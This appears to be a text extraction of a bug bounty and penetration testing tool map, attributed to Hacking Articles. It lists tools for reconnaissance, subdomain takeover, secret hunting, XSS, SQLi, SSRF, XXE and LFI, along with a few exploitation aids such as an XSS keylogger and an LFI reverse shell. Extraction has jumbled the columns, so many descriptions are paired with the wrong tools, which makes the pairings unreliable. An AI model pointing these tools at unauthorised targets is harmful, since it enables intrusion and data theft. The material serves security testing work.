A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites.

JSONBee

The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis CyberChef

Automated security reporting from markdown templates (HackerOne

bountyplz
and Bugcrowd are currently the platforms supported)

A list of useful payloads and bypass for Web Application Security and Pentest/CTF PayloadsAllTheThings

This repo contains hourly-updated data dumps of bug bounty platform

scopes (like Hackerone/Bugcrowd/Intigriti/etc) that are eligible for bounty-targets-data
reports Uncategorized
A collection of android security related resources android-security-awesome

An effort to build a single place for all useful android and iOS security
awesome-mobile-security
related stuff.

Awesome Vulnerable Applications awesome-vulnerable-apps

X-Forwarded-For [403 forbidden] enumeration XFFenum

httpx is a fast and multi-purpose HTTP toolkit allow to run multiple

probers using retryablehttp library, it is designed to maintain the result httpx
reliability with increased threads.

Nuclei is a fast tool for configurable targeted scanning based on

nuclei
templates offering massive extensibility and ease of use.

Automated pentest framework for offensive security experts Sn1per

Metasploit Framework metasploit-framework

Nikto web server scanner nikto

Web Application Security Scanner Framework arachni

The Swiss Army knife for automated Web Application Testing jaeles

scanner detecting the use of JavaScript libraries with known vulnerabilities retire.js

Fully automated offensive security framework for reconnaissance and

Osmedeus
vulnerability scanning
Vulnerability Scanners
Command line utility for searching and downloading exploits getsploit

A pretty sweet vulnerability scanner flan

Find exploits in local and online databases instantly Findsploit

A Python based web application scanner to gather OSINT and fuzz for
BlackWidow
OWASP vulnerabilities on a target website.

inds unknown classes of injection vulnerabilities backslash-powered-scanner

Multithreaded Plugin based vulnerability scanner for mass detection of

Eagle
web-based applications vulnerabilities

World’s most popular free web security tools and is actively

OWASP ZAP
maintained by a dedicated international team of volunteers

Subdomain Takeover tool written in Go subjack

Sub-Domain TakeOver Vulnerability Scanner Subdomain-takeover

A Powerful Subdomain Takeover Tool Sub0ver

A tool used to check if a CNAME resolves to the scope address. If the
CNAME resolves to a non-scope address it might be worth checking out
if subdomain takeover is possible.
Python utility to takeover domains vulnerable to AWS NS Takeover
a list of services and how to claim (sub)domains with dangling DNS records
CeWL (Custom Word List generator) is a ruby app which spiders a
cewl given URL, up to a specified depth, and returns a list of words which can
autoSubTakeover then be used for password crackers such as John the Ripper.
CUPP tool is an automated script written in the python language that
NSBrute cUPP interacts with the user and answers some fundamental questions about
the victim like Name, Company Name, Partner's Name, etc.
can-i-take-over-xyz

take a list of resolved subdomains and output any corresponding CNAMES en masse. cnames Subdomain Takeover Crunch is a wordlist generator where you can specify a standard
crunch character set or any set of characters to be used in generating the
Hijacking forgotten & misconfigured subdomains subHijack wordlists.

A tool that can help detect and takeover subdomains with dead DNS records tko-subs pydictor A powerful and useful hacker dictionary builder for a brute-force attack

This app will bruteforce for exisiting subdomains and provide Wordlists RSMangler will take a wordlist and perform various manipulations on it
HostileSubBruteforcer
information if the 3rd party host has been properly setup. similar to those done by John the Ripper the main difference being that
rsmangler it will first take the input words and generate all permutations and the
Second-order subdomain takeover scanner second-order
acronym of the words (in order they appear in the file) before it applies
A tool for testing subdomain takeover possibilities at a mass scale. takeover the rest of the mangles.

DNS Reaper is yet another sub-domain takeover tool, but with an rockyou.txt Kali Linux provides this dictionary file as part of its standard installation.
emphasis on accuracy, speed and the number of signatures in our dnsReaper
SecLists is a collection of multiple types of lists used during security
arsenal!
seclists assessments. List types include usernames, passwords, URLs, sensitive
data grep strings, fuzzing payloads, and many more.
A Chrome Extension to track postMessage usage (url, domain and Assetnote Wordlists wordlists.assetnote.io
stack) both by logging using CORS and also visually as an extension- postMessage-tracker
icon postMessage
A script to enumerate Google Storage buckets, determine what access
WebDeveloper Tool PostMessage_Fuzz_Tool Google Cloud Storage GCPBucketBrute
you have to them, and determine if they can be privilege escalated.

A toolkit for testing, tweaking and cracking JSON Web Tokens jwt_tool
Digital Ocean spaces-finder A tool to hunt for publicly accessible DigitalOcean Spaces
JWT brute force cracker written in C c-jwt-cracker

The Burp extension to check JWT (JSON Web Tokens) for using keys
jwt-heartbreaker
from known from public sources Commix Automated All-in-One OS command injection and exploitation tool.

Modular command-line tool to parse, create and manipulate JWT tokens for hackers jwtear
JSON Web Token SQLi sqlmap Automatic SQL injection and database takeover tool http://sqlmap.org
Command Injection
Simple python script to check against hypothetical JWT vulnerability. jwt-key-id-injector Sqliv massive SQL injection vulnerability scanner

jwt-hack is tool for hacking / security testing to JWT. jwt-hack Sqlmate A friend of SQLmap which will do what you always expected from SQLmap.

Simple HS256 JWT token brute force cracker jwt-cracker

XSStrike Most advanced XSS scanner.
XSS
WPScan is a free, for non-commercial use, black box WordPress security scanner wpscan XSS-keylogger A keystroke logger to exploit XSS vulnerabilities in a site

CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal

CMSeek
and over 170 other CMSs
ΑΡΙ Secretx Extracting apt keys and secrets by requesting each url in your list.
A plugin-based scanner that aids security researchers in identifying
Droopescan
issues with several CMSs, mainly Drupal & Silverstripe.

Drupal enumeration & exploitation tool Drupwn s3brute s3 brute force tool

A centralized dashboard for running and scheduling WordPress scans powered by wpscan utility. WPSpider
CMS S3-bucket-finder Find aws 53 buckets and extract datas

Wordpress Recon wprecon bucket-stream Find interesting Amazon 53 Buckets by watching certificate

CMSmap is a python open source CMS scanner that automates the slurp Enumerate $3 buckets via certstream, domain, or keywords.
CMSmap
process of detecting security flaws of the most popular CMSs.
A Ruby script to bruteforce for AWS s3 buckets using different
lazys3
OWASP Joomla Vulnerability Scanner Project joomscan AWS 53 Bucket permutations

Free web-application vulnerability and version scanner pyfiscan A simple file-based scanner to look for potential AWS access and secret
cred scanner
keys in files

A tool used to analyze big volumes of various file types in search of

Scan for open AWS S3 buckets and dump the contents S3Scanner
DumpsterDiver harcoded secrets like keys (AWS Access Key, Azure Share Key or SSH
Security Tool to Look For Interesting Files in S3 Buckets AWSBucketDump keys) or passwords.

CloudScraper: Tool to enumerate targets in search of cloud resources. S3Scanner Scan for open AWS S3 buckets and dump the contents
CloudScraper
S3 Buckets, Azure Blobs, Digital Ocean Storage Space.

Publicly Open Amazon AWS S3 Bucket Viewer s3viewer JSParser A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files.
S3 Bucket Weakness Discovery festin relative-url-extractor A small tool that extracts relative URLS from a file.
Inspecting JS Files
The format of various s3 buckets is convert in one format. for sub.js A tool to get javascript files from a list of URLS or subdomains
s3reverse
bugbounty and security testing.
LinkFinder A python script that finds endpoints in JavaScript files
This tests a list of s3 buckets to see if they have dir listings enabled or if they are uploadable mass-s3-bucket-tester

Firefox plugin that lists Amazon S3 Buckets found in requests S3BucketList

Cobra Source Code Security Audit
Finds Directory Listings or open S3 buckets from a list of URLs dirlstr
Buckets Crawler Crawl website extract links
Burp extension that performs a passive scan to identify cloud buckets
Burp-AnonymousCloud waybackMachine Use wayback Machine data to pull a list of paths
and then test them for publicly accessible vulnerabilities
Code Audit meg Fetch many paths for many hosts - without killing the hosts
S3 bucket finder from html,js and bucket misconfiguration testing tool kicks3
Simple, fast web crawler designed for easy, quick discovery of
Enumerate s3 buckets for a specific target. 2tearsinabucket hakrawler
endpoints and assets within a web application
Whitebox evaluation of effective S3 object permissions, to identify
s3_objects_check igoturls WaybackURLS + OtxURLS + CommonCrawl
publicly accessible files.

A security toolkit for Amazon S3 s3tk

Sniper Automated pentest framework for offensive security experts
Awesome cloud enumerator CloudBrute
XRay XRay is a tool for recon, mapping and OSINT gathering from public networks
This tool will get the CNAME first if it's a valid Amazon s3 bucket and if
s3cario An #OSINT Framework to perform various recon techniques on
it's not, it will try to check if the domain is a bucket name.
Datasploit Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate
All-in-one AWS S3 bucket tool for pentesters. S3Cruze all the raw data, and give data in multiple formats

Fully automated offensive security framework for reconnaissance and

Osmedeus
A repository with 3 tools for pwn'ing websites with .git repositories available GitTools vulnerability scanning

Leak git repositories from misconfigured websites gitjacker Frameworks TIDoS-Framework The Offensive Manual Web Application Penetration Testing Framework

A tool to dump a git repository from a website git-dumper Git Custom bash scripts used to automate various penetration testing tasks
discover including recon, scanning, parsing, and creating malicious payloads and
A tool for searching a Git repository for interesting content GitHunter listeners with Metasploit
Rip web accessible (distributed) version control systems: SVN/GIT/HG... dvcs-ripper lazyrecon This script is intended to automate your reconnaissance process in an organized fashion

003Recon Some tools to automate recon - 003random

Prevents you from committing secrets and credentials into git repositories git-secrets
Vulmap is a web vulnerability scanning and verification tool that can
Scan git repos (or files) for secrets using regex and entropy gitleaks Vulmap scan webapps for vulnerabilities and has a vulnerability verification
function
Searches through git repositories for high entropy strings and secrets,
truffleHog
digging deep into commit history

gitGraber: monitor GitHub to search and find sensitive data in real time Findomain The fastest and cross-platform subdomain enumerator, do not waste your time
gitGraber
for different online services chaos-client Go client to communicate with Chaos DNS API
By hooking into the pre-push hook provided by Git, Talisman validates domained Multi Tool Subdomain Enumeration
the outgoing changeset for things that look suspicious - such as talisman
authorization tokens and private keys. This repository contains all the material from the talk "Esoteric sub-
bugcrowd-levelup-subdomain-enumeration domain enumeration techniques" given at Bugcrowd LevelUp 2017
Semi-automated, feedback-driven tool to rapidly search through troves virtual conference
GitGot
of public data on GitHub for sensitive secrets.
shuffleDNS is a wrapper around massdns written in go that allows you
A tool to capture all the git secrets by leveraging multiple open source git searching tools git-all-secrets shuffledns to enumerate valid subdomains using active bruteforce as well as
Tools to perform basic search on GitHub. github-search resolve subdomains with wildcard handling and easy input-output

Finding potential software vulnerabilities from git commit messages git-vuln-finder censys-subdomain-finder Perform subdomain enumeration using the certificate transparency logs from Censys.

#OSINT tool for finding Github repositories by extracting commit logs Turbolist3r Subdomain enumeration tool with analysis features for discovered domains
commit-stream
in real time from the Github event API A script to extract subdomains/emails for a given domain using SSL/
Secrets censys-enumeration
Reconnaissance tool for GitHub organizations gitrob TLS certificate dataset on Censys

Scan your code for security misconfiguration, search for passwords and secrets. repo-supervisor tugarecon Fast subdomains enumeration tool for penetration testers

Tool for advanced mining for content on Github GitMiner as3nt Another Subdomain ENumeration Tool

Ah shhgit! Find GitHub secrets in real time shhgit Subra A Web-UI for subdomain enumeration (subfinder)

An enterprise friendly way of detecting and preventing secrets in code. detect-secrets Passive reconnaissance/enumeration of interesting targets by watching
Substr3am
for SSL certificates being issued
A suite of secret scanners built in Rust for performance. Based on TruffleHog rusty-hog
domain enumall.py Setup script for Regon-ng
Identify hardcoded secrets and dangerous behaviours whispers
altdns Generates permutations, alterations and mutations of subdomains and then resolves them
Yar is a tool for plunderin' organizations, users and/or repositories. yar
An automation framework for running multiple open sourced
Search exposed EBS volumes for secrets dufflebag brutesubs subdomain bruteforcing tools (in parallel) using your own wordlists via
Docker Compose
Monitors Github for leaked secrets secret-bridge
This is a parallelised domain name prober to find as many subdomains
EarlyBird is a sensitive data detection tool capable of scanning source dns-parallel-prober
of a given domain as fast as possible
code repositories for clear text password violations, PII, outdated earlybird
cryptography methods, key files and more. dnscan dnscan is a python wordlist-based DNS subdomain scanner
Trufflehog-Chrome-Extension Subdomain Enumeration hakrevdns Small, fast tool for performing reverse DNS lookups en masse

Dnsx is a fast and multi-purpose DNS toolkit allow to run multiple DNS
dnsx
Hydra is a parallelized login cracker which supports numerous protocols to attack. thc-hydra queries of your choice with a list of user-supplied resolvers

One place for all the default credentials to assist the Blue/Red teamers crtndstry Yet another subdomain finder
DefaultCreds-cheat-sheet
activities on finding devices with default password
VHostScan A virtual host scanner that performs reverse lookups
A default credential scanner. changeme
Passwords
scilla Information Gathering tool - DNS / Subdomains / Ports / Directories enumeration
Automatically brute force all services running on a target. BruteX
A research-grade suite of tools for subdomain enumeration,
sub3suite
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. patator intelligence gathering and attack surface mapping.

Aquatone A Tool for Domain Flyovers

A collection of scripts that run on my web server. Mainly for debugging Knockpy is a python tool designed to enumerate subdomains on a
ground-control Knockpy
SSRF, blind XSS, and XXE vulnerabilities. target domain through a wordlist.
List DTDs and generate XXE payloads using those local DTDs. dtd-finder subbrute A DNS meta-query spider that enumerates DNS records, and subdomains
Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids) docem Assetfinder Find domains and subdomains related to a given domain
A mini webserver with FTP support for XXE payloads xxeserv Rsdl Subdomain Scan with the Ping Method
XXE Injection
Tool to help exploit XXE vulnerabilities xxexploiter Bug Bounty Tools Massdns
A high-performance DNS stub resolver for bulk lookups and
reconnaissance (subdomain enumeration)
Toolkit to detect and keep track on Blind XSS, XXE & SSRF B-XSSRF
Subfinder is a subdomain discovery tool that discovers valid
Tool for automatic exploitation of XXE vulnerability using direct and
XXEinjector Subfinder subdomains for websites. Designed as a passive framework to be useful
different out of band methods.
for bug bounties and safe for penetration testing
A tool for embedding XXE/XML exploits into different filetypes oxml_xxe
Amass In-depth Attack Surface Mapping and Asset Discovery

Sub.sh Online Subdomain Detect Script

Most advanced XSS scanner. XSStrike
Sublist3r Fast subdomains enumeration tool for penetration testers
Hack with JavaScript. xssor2
Sudomy is a subdomain enumeration tool to collect subdomains and
66/66 wavsep XSS detected xsscrapy Sudomy analyzing domains performing automated reconnaissance (recon) for
Sleepy Puppy XSS Payload Management Framework sleepy-puppy bug hunting / pentesting

ezXSS is an easy way for penetration testers and bug bounty hunters to Multithreaded perl script to enumerate DNS information of a domain
ezXSS dnsenum
test (blind) Cross Site Scripting and to discover non-contiguous ip blocks

The XSS Hunter service - a portable version of XSSHunter.com xsshunter

masscan TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool
dalfox
based on golang RustScan The Modern Port Scanner

Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, naabu A fast port scanner written in go with focus on reliability and simplicity.
xsser
exploit and report XSS vulnerabilities in web-based applications.
Port Scanning nmap Nmap - the Network Mapper. Github mirror of official SVN repository
Powerfull XSS Scanning and Parameter analysis tool&gem XSpear
Nmap on steroids. Simple CLI with the ability to run pure Nmap
sandmap
XSS payloads designed to turn alert(1) into P1 weaponised-XSS-payloads engine, 31 modules with 459 scan profiles.

A tool designed to assist with finding all sinks and sources of a web Combines the speed of masscan with the reliability and detailed
tracy ScanCannon
application and display these results in a digestible manner. enumeration of nmap

A collection of scripts that run on my web server. Mainly for debugging

ground-control
SSRF, blind XSS, and XXE vulnerabilities. EyeWitness is designed to take screenshots of websites, provide some
EyeWitness
server header info, and identify default credentials if possible.
This is a burp intruder extender that is designed for automation and
xssValidator
validation of XSS vulnerabilities. Aquatone is a tool for visual inspection of websites across a large
An interactive multi-user web JS shell JSShell aquatone amount of hosts and is convenient for quickly gaining an overview of
HTTP-based attack surface.
bXSS is a utility which can be used by bug hunters and organizations to
bXSS screenshoteer Make website screenshots and mobile emulations from the command line.
identify Blind Cross-Site Scripting.

Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE gowitness a golang, web screenshot utility using Chrome Headless
docem
on steroids) Screenshots Web Inventory tool, takes screenshots of webpages using Pyppeteer
XSS Radar is a tool that detects parameters and fuzzes them for cross-site scripting vulnerabilities. XSS-Radar WitnessMe (headless Chrome/Chromium) and provides some extra bells &
whistles to make life easier
BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application. BruteXSS
XSS Injection eyeballer Convolutional neural network for analyzing pentest screenshots
A fast DOM based XSS vulnerability scanner with simplicity. findom-xss
scrying A tool for collecting RDP, web and VNC screenshots all in one place
DOM XSS scanner for Single Page Applications domdig
Depix Recovers passwords from pixelized screenshots
Automated blind-xss search for Burp Suite femida
httpscreenshot HTTPScreenshot is a tool for grabbing screenshots and HTML of large numbers of websites
Toolkit to detect and keep track on Blind XSS, XXE & SSRF B-XSSRF

DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities domxssscanner wappalyzer Identify technology on websites.
Correlated injection proxy tool for XSS Hunter xsshunter_client Port of Wappalyzer (uncovers technologies used on websites) to
webanalyze
A better version of my xssfinder tool - scans for different types of xss on a list of urls. extended-xss-search - automate mass scanning.

XSSMap is a tool developed based on Python3 to detect XSS vulnerabilities xssmap python-builtwith BuiltWith API client

Simple XSS Scanner tool XSSCon whatweb Next generation web scanner
Technologies
BurpSuite extension to inject custom cross-site scripting payloads on retire.js scanner detecting the use of JavaScript libraries with known vulnerabilities
BitBlinder
every form/request submitted to detect blind XSS vulnerabilities httpx is a fast and multi-purpose HTTP toolkit allows to run multiple
Maintaining account persistence via XSS and Oauth XSSOauthPersistence httpx probers using retryablehttp library, it is designed to maintain the result
reliability with increased threads.
Shadow Workers is a free and open source C2 and proxy designed for
penetration testers to help in the exploitation of XSS and malicious shadow-workers fingerprintx is a standalone utility for service discovery on open ports
fingerprintx
Service Workers (SW) that works well with other popular bug bounty command line tools.

This is a burp plugin that extracts keywords from response using

rexsser
regexes and test for reflected XSS on the target scope. gobuster Directory/File, DNS and VHost busting tool written in Go

XSS hunter on cloudflare serverless workers. xss-flare Feroxbuster A fast, simple, recursive content discovery tool written in Rust.

The burpsuite plugin automatically adds xss sql payload to fuzz all GP Ffuf Fast web fuzzer written in Go
Xss-Sql-Fuzz
parameters (filtering special parameters) with one click
dirsearch Web path scanner
Detect, manage and exploit Blind Cross-site scripting (XSS) vulnerabilities. vaya-ciego-nen
rapid content discovery tool for recursively querying webservers, handy
recursebuster
Chrome extension that finds DOM based XSS vulnerabilities dom-based-xss-finder in pentesting and web application assessments

Develop your own XSS Payload using interactive typing XSSTerminal Content Discovery filebuster An extremely fast and flexible web fuzzer

PNG IDAT chunks XSS payload generator xss2png dirstalk An extremely fast and flexible web fuzzer

A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacks XSSwagger dirbuster-ng An extremely fast and flexible web fuzzer

gospider Gospider - Fast web spider written in Go

Automatic SQL injection and database takeover tool sqlmap Simple, fast web crawler designed for easy, quick discovery of
hakrawler
Automated NoSQL database enumeration and web application exploitation tool. NoSQLMap endpoints and assets within a web application

Automatic SQL injection with Charles and sqlmap api SQLiScanner crawley fast, feature-rich unix-way web scraper/crawler written in Golang.

Python3 Burp History parsing tool to discover potential SQL injection

SleuthQL
points. To be used in tandem with SQLmap. LinkFinder A python script that finds endpoints in JavaScript files

mssqlproxy is a toolkit aimed to perform lateral movement in restricted JS-Scan a .js scanner, built in php. designed to scrape urls and other info
environments through a compromised Microsoft SQL Server via socket mssqlproxy
LinksDumper Extract (links/possible endpoints) from responses & filter them via decoding/sorting
reuse
GoLinkFinder A fast and minimal JS endpoint extractor
SQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API
sqli-hunter
wrapper that makes digging SQLi easy. Links BurpJSLinkFinder Burp Extension for a passive scanning JS files for endpoint links.
Gather urls from wayback machine then test each GET parameter for sql injection. waybackSqliScanner SQL Injection urlgrab A golang utility to spider through a website searching for additional links.
Evil SQL Client (ESC) is an interactive .NET SQL console client with waybackurls Fetch all the URLs that the Wayback Machine knows about for a domain
ESC
enhanced SQL Server discovery, access, and data exfiltration features.
getJS A tool to fastly get all javascript sources/files
SQL injection script for MSSQL that extracts domain users mssqli-duet
linx Reveals invisible links within JavaScript files
Performing SQLInjection test on Burp Suite Bulk Requests using SQLMap burp-to-sqlmap

Messy BurpSuite plugin for SQL Truncation vulnerabilities. BurpSQLTruncSanner

parameth This tool can be used to brute discover GET and POST parameters
Blind SQL Injection Tool with Golang andor
This extension identifies hidden, unlinked parameters. It's particularly
param-miner
A python library to automate time-based blind SQL injection Blinder useful for finding web cache poisoning vulnerabilities.
Parameters ParamPamPam This tool for brute discover GET and POST parameters.
massive SQL injection vulnerability scanner sqliv

NoSql Injection CLI tool, for finding vulnerable websites using MongoDB nosqli Arjun HTTP parameter discovery suite.

ParamSpider Mining parameters from dark corners of Web Archives.

Automatic SSRF fuzzer and exploitation tool SSRFmap

This tool generates gopher link for exploiting SSRF and gaining RCE in various servers Gopherus wfuzz Web application fuzzer

A collection of scripts that run on my web server. Mainly for debugging ffuf Fast web fuzzer written in Go
ground-control
SSRF, blind XSS, and XXE vulnerabilities.
Dictionary of attack patterns and primitives for black-box application
fuzzdb
An automated SSRF finder. Just give the domain name and your server fault injection and resource discovery.
SSRFire
and chill! ;) Also has options to find XSS and open redirects
A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz
Automatic tool for DNS rebinding-based SSRF attacks httprebind Fuzzing IntruderPayloads lists, malicious file uploads and web pentesting methodologies and
checklists.
A simple SSRF-testing sheriff written in Go ssrf-sheriff
fuzz.txt Potentially dangerous files
Toolkit to detect and keep track on Blind XSS, XXE & SSRF B-XSSRF
fuzzilli A JavaScript Engine Fuzzer
Smart ssrf scanner using different methods like parameter brute
extended-ssrf-search fuzzapi Fuzzapi is a tool used for REST API pentesting and uses API_Fuzzer gem
forcing in post and get...

Fetch known URLs from AlienVault's Open Threat Exchange, the vaf very advanced (web) fuzzer written in Nim.
Wayback Machine, and Common Crawl and Filter Urls With gaussrf
OpenRedirection or SSRF Parameters.
Server Side Request Forgery Corsy CORS Misconfiguration Scanner
Server-side request forgery detector ssrfDetector
CORStest A simple CORS misconfiguration scanner
Authenticated SSRF in Grafana grafana-ssrf CORS Misconfiguration
cors-scanner A multi-threaded scanner that helps identify CORS flaws/misconfigurations
Tool to searching sentry config on page or in javascript files and check blind SSRF sentrySSRF
CorsMe Cross Origin Resource Sharing MisConfiguration Scanner
Bruteforcing on Hidden parameters to find SSRF vulnerability using
lorsrf
GET and POST Methods
CRLFsuite A fast tool specially designed to scan CRLF injection
A DNS rebinding attack framework. singularity
crlfuzz A fast tool to scan CRLF vulnerability written in Go
A "malicious" DNS server for executing DNS Rebinding attacks on the CRLF Injection
whonow
fly (public instance running on rebind.network:53) CRLF-Injection-Scanner Command line tool for testing CRLF injection on a list of domains.

A front-end JavaScript toolkit for creating DNS rebinding attacks. dns-rebind-toolkit Injectus CRLF and open redirect fuzzer

DNS Rebinding Exploitation Framework dref

Simple DNS Rebinding Service rbndr CSRF Injection XSRFProbe The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.
Automatic tool for DNS rebinding-based SSRF attacks httprebind

DNS rebinding toolkit dnsFookup dotdotpwn The Directory Traversal Fuzzer

FDsploit File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
HTTP Request Smuggling Detection Tool http-request-smuggling Directory Traversal
off-by-slash Burp extension to detect alias traversal via NGINX misconfiguration at scale.
An HTTP Request Smuggling / Desync testing tool written in Python 3 smuggler
tired of manually add dot-dot-slash to your possible path traversal? this
Request Smuggling liffier
short snippet will increment ../ on the URL.
HTTP Request Smuggling over HTTP/2 Cleartext (h2c) h2csmuggler

These scripts I use to create Request Smuggling Desync payloads for

tiscripts
CLTE and TECL style attacks.

A Kernel fuzzer focusing on race bugs razzer

Race Condition framework racepwn

Small Python library that makes it easy to exploit race conditions in web apps with Requests. requests-racer @hackinarticles

Turbo Intruder is a Burp Suite extension for sending large numbers of Race Condition
turbo-intruder
HTTP requests and analyzing the results. https://github.com/Ignitetechnologies
Tests for race conditions in web applications. Includes a RESTful API to
integrate into a continuous integration pipeline.
race-the-web
https://in.linkedin.com/company/hackingarticles
Request Smuggling

Open Redirection Analyzer Oralyzer

CRLF and open redirect fuzzer Injectus

Open Redirect
Small script to check a list of domains against open redirect vulnerability dom-red

A Fuzzer for OpenRedirect issues OpenRedireX

Automatic authorization enforcement detection extension for burp suite

written in Jython developed by Barak Tawily
Autorize Insecure Direct Object References

A proof-of-concept tool for generating payloads that exploit unsafe

ysoserial
Java object deserialization.

Probe endpoints consuming Java serialized objects to identify classes,

GadgetProbe
libraries, and library versions on remote Java classpaths. Insecure Deserialization
Deserialization payload generator for a variety of .NET formatters ysoserial.net

PHPGGC is a library of PHP unserialize() payloads along with a tool to

phpggc
generate them, from command line or programmatically.

Customisable and automated HTTP header injection. headi Header Injection

A Burp Extension for GraphQL Security Testing inql

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. GraphQLmap

GraphQL security testing tool shapeshifter GraphQL Injection

Burp Suite extension to help make Graphql request more readable graphql_beautifier

Obtain GraphQL API schema despite disabled introspection! clairvoyance

Local file inclusion exploitation tool liffy

Fuzzing for LFI using Burpsuite Burp-LFI-tests

Scripts to execute enumeration via LFI LFI-Enum File Inclusion

Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner LFISuite

Wordlist to bruteforce for LFI LFI-files